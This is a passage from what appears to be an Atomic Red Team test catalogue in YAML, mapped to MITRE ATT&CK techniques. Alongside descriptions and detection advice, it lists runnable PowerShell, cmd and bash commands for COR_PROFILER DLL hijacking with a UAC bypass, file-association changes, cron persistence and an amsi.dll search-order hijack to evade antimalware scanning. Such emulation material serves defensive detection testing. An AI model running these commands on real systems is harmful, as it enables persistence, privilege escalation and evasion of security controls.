- x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_contributors: - - Jesse Brown, Red Canary - x_mitre_platforms: - - Windows - identifier: T1574.012 - atomic_tests: - - name: User scope COR_PROFILER - auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a - description: | - Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). - The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. - Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. - If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, - the notepad process will not execute with high integrity. 
- - Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - supported_platforms: - - windows - input_arguments: - file_name: - description: unmanaged profiler DLL - type: Path - default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" - executor: - command: | - Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan - New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null - Write-Host "executing eventvwr.msc" -ForegroundColor Cyan - START MMC.EXE EVENTVWR.MSC - cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" - -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment - -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty - -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore - | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" - -Force -ErrorAction Ignore | Out-Null\n" - name: powershell 
- - name: System Scope COR_PROFILER - auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 - description: | - Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. - The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity - level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will - still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. - - Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - supported_platforms: - - windows - input_arguments: - file_name: - description: unmanaged profiler DLL - type: Path - default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" - executor: - command: | - Write-Host "Creating system environment variables" -ForegroundColor Cyan - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null - New-ItemProperty -Path 
'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null - cleanup_command: | - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null - name: powershell - elevation_required: true - - name: Registry-free process scope COR_PROFILER - auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 - description: | - Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. 
- - Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - supported_platforms: - - windows - input_arguments: - file_name: - description: unamanged profiler DLL - type: Path - default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" - executor: - command: | - $env:COR_ENABLE_PROFILING = 1 - $env:COR_PROFILER = '#{clsid_guid}' - $env:COR_PROFILER_PATH = '#{file_name}' - POWERSHELL -c 'Start-Sleep 1' - cleanup_command: | - $env:COR_ENABLE_PROFILING = 0 - $env:COR_PROFILER = '' - $env:COR_PROFILER_PATH = '' - name: powershell - T1546.001: - technique: - created: '2020-01-24T13:40:47.282Z' - modified: '2020-01-24T13:40:47.282Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - type: attack-pattern - id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c - description: "Adversaries may establish persistence by executing malicious content - triggered by a file type association. When a file is opened, the default program - used to open the file (also called the file association or handler) is checked. - File association selections are stored in the Windows Registry and can be - edited by users, administrators, or programs that have Registry access (Citation: - Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or - by administrators using the built-in assoc utility. 
(Citation: Microsoft Assoc - Oct 2017) Applications can modify the file association for a given file extension - to call an arbitrary program when a file with the given extension is opened.\n\nSystem - file associations are listed under HKEY_CLASSES_ROOT\\.[extension], - for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler - for that extension located at HKEY_CLASSES_ROOT\\[handler]. The - various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. - For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* - HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe - values of the keys listed are commands that are executed when the handler - opens the file extension. Adversaries can modify these values to continually - execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)" - name: Change Default File Association - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1546.001 - url: https://attack.mitre.org/techniques/T1546/001 - - external_id: CAPEC-556 - source_name: capec - url: https://capec.mitre.org/data/definitions/556.html - - url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs - description: Microsoft. (n.d.). Change which programs Windows 7 uses by default. - Retrieved July 26, 2016. - source_name: Microsoft Change Default Programs - - url: http://msdn.microsoft.com/en-us/library/bb166549.aspx - description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. - Retrieved November 13, 2014. - source_name: Microsoft File Handlers - - url: https://docs.microsoft.com/windows-server/administration/windows-commands/assoc - description: Plett, C. et al.. (2017, October 15). assoc. 
Retrieved August - 7, 2018. - source_name: Microsoft Assoc Oct 2017 - - url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd - description: Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August - 8, 2018. - source_name: TrendMicro TROJ-FAKEAV OCT 2012 - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Windows Registry - x_mitre_detection: |- - Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. - - User file association preferences are stored under [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys. - - Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. - x_mitre_permissions_required: - - Administrator - - SYSTEM - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1546.001 - atomic_tests: - - name: Change Default File Association - auto_generated_guid: 10a08978-2045-4d62-8c42-1957bbbea102 - description: "Change Default File Association From cmd.exe of hta to notepad.\n\nUpon - successful execution, cmd.exe will change the file association of .hta to - notepad.exe. 
\n" - supported_platforms: - - windows - input_arguments: - target_extension_handler: - description: txtfile maps to notepad.exe - type: Path - default: txtfile - extension_to_change: - description: File Extension To Hijack - type: String - default: ".hta" - original_extension_handler: - description: File Extension To Revert - type: String - default: htafile - executor: - command: 'assoc #{extension_to_change}=#{target_extension_handler} - -' - cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} - -' - name: command_prompt - elevation_required: true - T1078.004: - technique: - id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 - description: |- - Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) - - Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. 
- name: Cloud Accounts - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1078.004 - url: https://attack.mitre.org/techniques/T1078/004 - - source_name: AWS Identity Federation - url: https://aws.amazon.com/identity/federation/ - description: Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, - 2020. - - source_name: Google Federating GC - url: https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction - description: Google. (n.d.). Federating Google Cloud with Active Directory. - Retrieved March 13, 2020. - - source_name: Microsoft Deploying AD Federation - url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs - description: Microsoft. (n.d.). Deploying Active Directory Federation Services - in Azure. Retrieved March 13, 2020. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-10-19T16:01:22.090Z' - created: '2020-03-13T20:36:57.378Z' - x_mitre_platforms: - - AWS - - GCP - - Azure - - SaaS - - Azure AD - - Office 365 - x_mitre_data_sources: - - Azure activity logs - - Authentication logs - - AWS CloudTrail logs - - Stackdriver logs - x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal - or malicious behavior, such as accessing information outside of the normal - function of the account or account usage at atypical hours. 
- x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - atomic_tests: [] - T1546.015: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.015 - url: https://attack.mitre.org/techniques/T1546/015 - - url: https://msdn.microsoft.com/library/ms694363.aspx - description: Microsoft. (n.d.). The Component Object Model. Retrieved August - 18, 2016. - source_name: Microsoft Component Object Model - - url: https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence - description: 'G DATA. (2014, October). COM Object hijacking: the discreet - way of persistence. Retrieved August 13, 2016.' - source_name: GDATA COM Hijacking - - source_name: Endgame COM Hijacking - description: 'Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting - Persistence & Evasion with the COM. Retrieved September 15, 2016.' - url: https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Component Object Model Hijacking - description: "Adversaries may establish persistence by executing malicious content - triggered by hijacked references to Component Object Model (COM) objects. - COM is a system within Windows to enable interaction between software components - through the operating system.(Citation: Microsoft Component Object Model) - \ References to various COM objects are stored in the Registry. \n\nAdversaries - can use the COM system to insert malicious code that can be executed in place - of legitimate software through hijacking the COM references and relationships - as a means for persistence. Hijacking a COM object requires a change in the - Registry to replace a reference to a legitimate system component which may - cause that component to not work when executed. 
When that system component - is executed through normal system operation the adversary's code will be executed - instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects - that are used frequently enough to maintain a consistent level of persistence, - but are unlikely to break noticeable functionality within the system as to - avoid system instability that could lead to detection. " - id: attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-07-09T13:55:51.172Z' - created: '2020-03-16T14:12:47.923Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: "There are opportunities to detect COM hijacking by searching - for Registry references that have been replaced and through Registry operations - (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary - paths with unknown paths or otherwise malicious content. Even though some - third-party applications define user COM objects, the presence of objects - within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and - should be investigated since user objects will be loaded prior to machine - objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Endgame - COM Hijacking) Registry entries for existing COM objects may change infrequently. - When an entry with a known good path and binary is replaced or changed to - an unusual value to point to an unknown binary in a new location, then it - may indicate suspicious behavior and should be investigated. \n\nLikewise, - if software DLL loads are collected and analyzed, any unusual DLL load that - can be correlated with a COM object Registry modification may indicate COM - hijacking has been performed. 
" - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Loaded DLLs - - DLL monitoring - - Windows Registry - x_mitre_contributors: - - Elastic - x_mitre_platforms: - - Windows - atomic_tests: [] - T1134.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1134.002 - url: https://attack.mitre.org/techniques/T1134/002 - - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing - description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved - April 21, 2017. - source_name: Microsoft Command-line Logging - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Create Process with Token - description: Adversaries may create a new process with a duplicated token to - escalate privileges and bypass access controls. An adversary can duplicate - a desired access token with DuplicateToken(Ex) and use it with - CreateProcessWithTokenW to create a new process running under - the security context of the impersonated user. This is useful for creating - a new process under the security context of a different user. - id: attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-26T21:28:19.476Z' - created: '2020-02-18T16:48:56.582Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_defense_bypassed: - - Windows User Account Control - - System access controls - - File system access controls - x_mitre_detection: |- - If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. 
Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) - - If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. - - Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Access tokens - - API monitoring - x_mitre_platforms: - - Windows - atomic_tests: [] - T1543: - technique: - external_references: - - source_name: mitre-attack - external_id: T1543 - url: https://attack.mitre.org/techniques/T1543 - - url: https://technet.microsoft.com/en-us/library/cc772408.aspx - description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. - source_name: TechNet Services - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf - description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical - OS X Malware Detection & Analysis. Retrieved July 10, 2017.' - source_name: OSX Malware Detection - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Create or Modify System Process - description: "Adversaries may create or modify system-level processes to repeatedly - execute malicious payloads as part of persistence. 
When operating systems - boot up, they can start processes that perform background system functions. - On Windows and Linux, these system processes are referred to as services. - (Citation: TechNet Services) On macOS, launchd processes known as [Launch - Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) - are run to finish system initialization and load user specific parameters.(Citation: - AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, - daemons, or agents that can be configured to execute at startup or a repeatable - interval in order to establish persistence. Similarly, adversaries may modify - existing services, daemons, or agents to achieve the same effect. \n\nServices, - daemons, or agents may be created with administrator privileges but executed - under root/SYSTEM privileges. Adversaries may leverage this functionality - to create or modify system processes in order to escalate privileges. (Citation: - OSX Malware Detection). " - id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T13:46:29.922Z' - created: '2020-01-10T16:03:18.865Z' - x_mitre_data_sources: - - Windows event logs - - Windows Registry - - File monitoring - - Process command-line parameters - - Process monitoring - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_detection: "Monitor for changes to system processes that do not correlate - with known software, patch cycles, etc., including by comparing results against - a trusted system baseline. New, benign system processes may be created during - installation of new software. 
Data and events should not be viewed in isolation, - but as part of a chain of behavior that could lead to other activities, such - as network connections made for Command and Control, learning details about - the environment through Discovery, and Lateral Movement. \n\nCommand-line - invocation of tools capable of modifying services may be unusual, depending - on how systems are typically used in a particular environment. Look for abnormal - process call trees from known services and for execution of other commands - that could relate to Discovery or other adversary techniques. \n\nMonitor - for changes to files associated with system-level processes." - x_mitre_platforms: - - Windows - - macOS - - Linux - atomic_tests: [] - T1053.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.003 - url: https://attack.mitre.org/techniques/T1053/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Cron - description: |- - Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. - - An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. cron can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. 
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-23T23:30:46.546Z' - created: '2019-12-03T14:25:00.538Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: false - x_mitre_permissions_required: - - User - x_mitre_detection: "Monitor scheduled task creation from common utilities using - command-line invocation. Legitimate scheduled tasks may be created during - installation of new software or through system administration functions. Look - for changes to tasks that do not correlate with known software, patch cycles, - etc. \n\nSuspicious program execution through scheduled tasks may show up - as outlier processes that have not been seen before when compared against - historical data. Data and events should not be viewed in isolation, but as - part of a chain of behavior that could lead to other activities, such as network - connections made for Command and Control, learning details about the environment - through Discovery, and Lateral Movement. " - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - identifier: T1053.003 - atomic_tests: - - name: Cron - Replace crontab with referenced file - auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75 - description: 'This test replaces the current user''s crontab file with the contents - of the referenced file. This technique was used by numerous IoT automated - exploitation attacks. 
- -' - supported_platforms: - - macos - - linux - input_arguments: - command: - description: Command to execute - type: string - default: "/tmp/evil.sh" - tmp_cron: - description: Temporary reference file to hold evil cron schedule - type: path - default: "/tmp/persistevil" - executor: - name: bash - command: | - crontab -l > /tmp/notevil - echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} - cleanup_command: 'crontab /tmp/notevil - -' - - name: Cron - Add script to all cron subfolders - auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 - description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, - /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a - schedule. This technique was used by the threat actor Rocke during the exploitation - of Linux web servers. - -' - supported_platforms: - - macos - - linux - input_arguments: - command: - description: Command to execute - type: string - default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log - cron_script_name: - description: Name of file to store in cron folder - type: string - default: persistevil - executor: - elevation_required: true - name: bash - command: | - echo "#{command}" > /etc/cron.daily/#{cron_script_name} - echo "#{command}" > /etc/cron.hourly/#{cron_script_name} - echo "#{command}" > /etc/cron.monthly/#{cron_script_name} - echo "#{command}" > /etc/cron.weekly/#{cron_script_name} - cleanup_command: | - rm /etc/cron.daily/#{cron_script_name} - rm /etc/cron.hourly/#{cron_script_name} - rm /etc/cron.monthly/#{cron_script_name} - rm /etc/cron.weekly/#{cron_script_name} - - name: Cron - Add script to /var/spool/cron/crontabs/ folder - auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 - description: 'This test adds a script to a /var/spool/cron/crontabs folder configured - to execute on a schedule. This technique was used by the threat actor Rocke - during the exploitation of Linux web servers. 
- -' - supported_platforms: - - linux - input_arguments: - command: - description: Command to execute - type: string - default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log - cron_script_name: - description: Name of file to store in /var/spool/cron/crontabs folder - type: string - default: persistevil - executor: - elevation_required: true - name: bash - command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - -' - cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - -' - T1574.001: - technique: - created: '2020-03-13T18:11:08.357Z' - modified: '2020-03-26T16:13:58.862Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern - id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 - description: |- - Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. - - There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. 
Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) - - Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking) - - If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. - Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. - name: DLL Search Order Hijacking - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.001 - url: https://attack.mitre.org/techniques/T1574/001 - - external_id: CAPEC-471 - source_name: capec - url: https://capec.mitre.org/data/definitions/471.html - - source_name: Microsoft Dynamic Link Library Search Order - url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN - description: Microsoft. (2018, May 31). Dynamic-Link Library Search Order. - Retrieved November 30, 2014. - - url: https://www.owasp.org/index.php/Binary_planting - description: OWASP. (2013, January 30). Binary planting. Retrieved June 7, - 2016. 
- source_name: OWASP Binary Planting - - source_name: Microsoft Security Advisory 2269637 - url: https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637 - description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved - March 13, 2020. - - source_name: Microsoft Dynamic-Link Library Redirection - url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN - description: Microsoft. (2018, May 31). Dynamic-Link Library Redirection. - Retrieved March 13, 2020. - - url: https://msdn.microsoft.com/en-US/library/aa375365 - description: Microsoft. (n.d.). Manifests. Retrieved December 5, 2014. - source_name: Microsoft Manifests - - source_name: FireEye DLL Search Order Hijacking - url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html - description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking - Revisited. Retrieved March 13, 2020. - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - DLL monitoring - - File monitoring - x_mitre_detection: Monitor file systems for moving, renaming, replacing, or - modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared - with past behavior) that do not correlate with known software, patches, etc., - are suspicious. Monitor DLLs loaded into a process and detect DLLs that have - the same file name but abnormal paths. Modifications to or creation of .manifest - and .local redirection files that do not correlate with software updates are - suspicious. 
- x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1574.001 - atomic_tests: - - name: DLL Search Order Hijacking - amsi.dll - auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 - description: | - Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) - https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ - - Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. - supported_platforms: - - windows - executor: - command: | - copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe - copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll - %APPDATA%\updater.exe -Command exit - cleanup_command: | - del %APPDATA%\updater.exe >nul 2>&1 - del %APPDATA%\amsi.dll >nul 2>&1 - name: command_prompt - elevation_required: true - T1574.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.002 - url: https://attack.mitre.org/techniques/T1574/002 - - external_id: CAPEC-641 - source_name: capec - url: https://capec.mitre.org/data/definitions/641.html - - source_name: About Side by Side Assemblies - url: 